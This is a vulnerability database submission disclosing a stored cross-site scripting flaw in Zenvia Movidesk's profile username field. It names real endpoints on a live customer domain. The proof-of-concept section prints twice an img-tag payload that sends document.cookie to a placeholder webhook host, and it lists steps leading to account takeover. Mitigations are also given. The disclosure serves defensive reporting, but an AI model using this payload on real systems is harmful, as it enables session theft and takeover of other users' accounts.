إرسال #486023: zenvia movidesk 25.01.15.86c796efe6 Cross Site Scriptingالمعلومات

عنوان	zenvia movidesk 25.01.15.86c796efe6 Cross Site Scripting
الوصف	Vulnerability Summary A stored XSS vulnerability was identified in Zenvia's Moviedesk system. The flaw occurs in the username field, allowing the injection of malicious code. When an attacker changes the profile name to contain an XSS payload, the code is stored in the system and executed automatically when other users access the ticket viewing page, enabling a zero-click Account Takeover (ATO) attack. Vulnerability Details Vulnerable endpoint (profile editing):https://service.sigmatelecom.com.br/Account/EditProfile Endpoint where the XSS is triggered (ticket view):https://service.sigmatelecom.com.br/Ticket Payload used: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`> Impact Automatic execution of malicious code upon viewing tickets; Theft of session cookies, enabling Account Takeover without user interaction (0-click); Compromise of accounts with access to ticket data; Privilege escalation if the attacker gains access to administrator credentials. Recommendations to mitigate this vulnerability, it is recommended to: Input sanitization: Implement strict filtering and validation of user inputs in the "Username" field. Output escaping: Ensure that all displayed data is properly escaped to prevent code execution. HTTPOnly cookies: Configure session cookies with the HttpOnly flag to prevent JavaScript access. Content Security Policy (CSP): Implement a restrictive CSP to mitigate unauthorized code execution. Security audits: Conduct regular security testing to identify similar vulnerabilities. Proof of Concept (PoC) Access the profile editing endpoint:https://service.sigmatelecom.com.br/Account/EditProfile Change the username to the following payload: <img src="https://your-webhook.com/?cookie=" + `${document.cookie}`> Save the changes. Access the ticket page:https://service.sigmatelecom.com.br/Ticket Observe that the payload is executed and cookies are sent to the webhook.
المصدر	⚠️ https://service.sigmatelecom.com.br/Ticket
المستخدم	y4g0 (UID 80480)
ارسال	21/01/2025 01:15 AM (1 سنة منذ)
الاعتدال	02/02/2025 08:54 AM (12 days later)
الحالة	تمت الموافقة
إدخال VulDB	294362 [Zenvia Movidesk حتى 25.01.22 Profile Editing /Account/EditProfile أسم المستخدم البرمجة عبر المواقع]
النقاط	17

التالي ▸نظرة عامة ◂ السابق

Do you know our Splunk app?

Download it now for free!